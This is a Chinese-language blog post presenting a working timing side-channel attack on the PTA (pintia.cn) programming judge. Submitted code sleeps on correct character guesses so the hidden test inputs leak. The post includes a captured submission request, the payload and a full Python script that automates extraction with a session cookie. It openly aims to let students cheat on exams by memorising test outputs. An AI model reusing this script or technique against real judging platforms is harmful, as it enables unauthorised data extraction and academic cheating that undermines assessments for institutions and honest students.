获取PTA测试用例-附带脚本
PTA是大家熟知的代码作业提交平台,有些考试也在PTA上进行
好不容易写的代码没有得分一定会想知道题目的测试用例是什么吧?
考试背不过代码,那么获取测试用例然后直接背输出结果会不会简单一些呢?毕竟测试用例一直是固定的
今天就给它搞一波
首先测试了一些数据外带和报错的方法,均没有成功,这里采用类似SQL时间盲注的方法
先讲一下盲注原理,我们先随便交一道题并进行抓包
这是提交代码的数据包
POST /api/exams/1234567388888888/submissions HTTP/2 Host: pintia.cn Cookie: 秘 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Accept: application/json;charset=UTF-8 {"details":[{"problemId":"0","problemSetProblemId":"261","programmingSubmissionDetail":{"compiler":"PYTHON3","program":"import time\nif input()=='99999':\n time.sleep(1)"}}],"problemType":"PROGRAMMING"}
响应包拿到一串神秘数字76543211111111
{"submissionId":"765432111111111","submissionType":"SUBMISSION_TYPE_NONE","problems":[]}
后面可以发现它是用来获取题目得分情况的,进行GET请求/api/submissions/765432111111111
响应包是一串json,包含题目的"错因"
那么我们可以像下面这段代码一样对输入的每一个字符依次判断,如果猜对了字符就延迟1秒,通过看"错因"是否为"超时"就可以判断是否猜对,如果"错因"为"非零返回"就超长了(如input()[10000000])
import time if input()[0]=='2': #如果输入的第一个字符是2 time.sleep(1) #延迟1秒
比如这个结果可以看出来2、3测试点第一个字符就是2,通过这样的方法就可以获取每一个字符,当然要写一个脚本自己跑
脚本就在这里啦,可以自己改装用于其他平台,也可以加入二分法提高效率
import sys import json import time import requests def get_json(url,post,cookie): header={'Host':'pintia.cn','Cookie':cookie,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','Content-Type':'application/json;charset=UTF-8','Accept':'application/json;charset=UTF-8'} r1=requests.post(url,data=post,headers=header) #提交答案拿到submissionId while True: r2=requests.get('https://pintia.cn/api/submissions/'+r1.json()['submissionId'],headers=header) #通过submissionId获取测试结果 if r2.json()['submission']['judgeResponseContents']!=[]: #成功获取到结果,有时需要等待 break time.sleep(2) return r2.json() url='https://pintia.cn'+input('URL:') #/api/exams/1552620996363530240/submissions post=input('POST:') cookie=input('Cookie:').replace(' ','') result=[] payload="import time\nif ord(input()[!])==#:\n time.sleep(1)" #本题延迟一秒即可 i=0 while True: for ascii_ in list(range(48,58)): #可能出现的字符ascii列表,这个范围是数字的 post_=post.replace('@',payload.replace('!',str(i)).replace('#',str(ascii_))) #设置payload json_=get_json(url,post_,cookie) #获取测试结果 max=len(json_['publicCases']) #测试用例总数 while len(result)<max: #将最终结果初始化为空 result+=[''] tmp=0 for j in list(range(max)): #判断每个用例的情况 if json_['submission']['judgeResponseContents'][0]['programmingJudgeResponseContent']['testcaseJudgeResults'][str(j)]['result']=='TIME_LIMIT_EXCEEDED': result[j]+=chr(ascii_) #字母正确 if json_['submission']['judgeResponseContents'][0]['programmingJudgeResponseContent']['testcaseJudgeResults'][str(j)]['result']=='NON_ZERO_EXIT_CODE': tmp+=1 if tmp==max: #每一个用例结果都超长 sys.exit() print(result) i+=1
POST是提交题目的包的json字符串,要将program的值替换为@
所以这道题的测试用例就是
14
5
2
29
99999
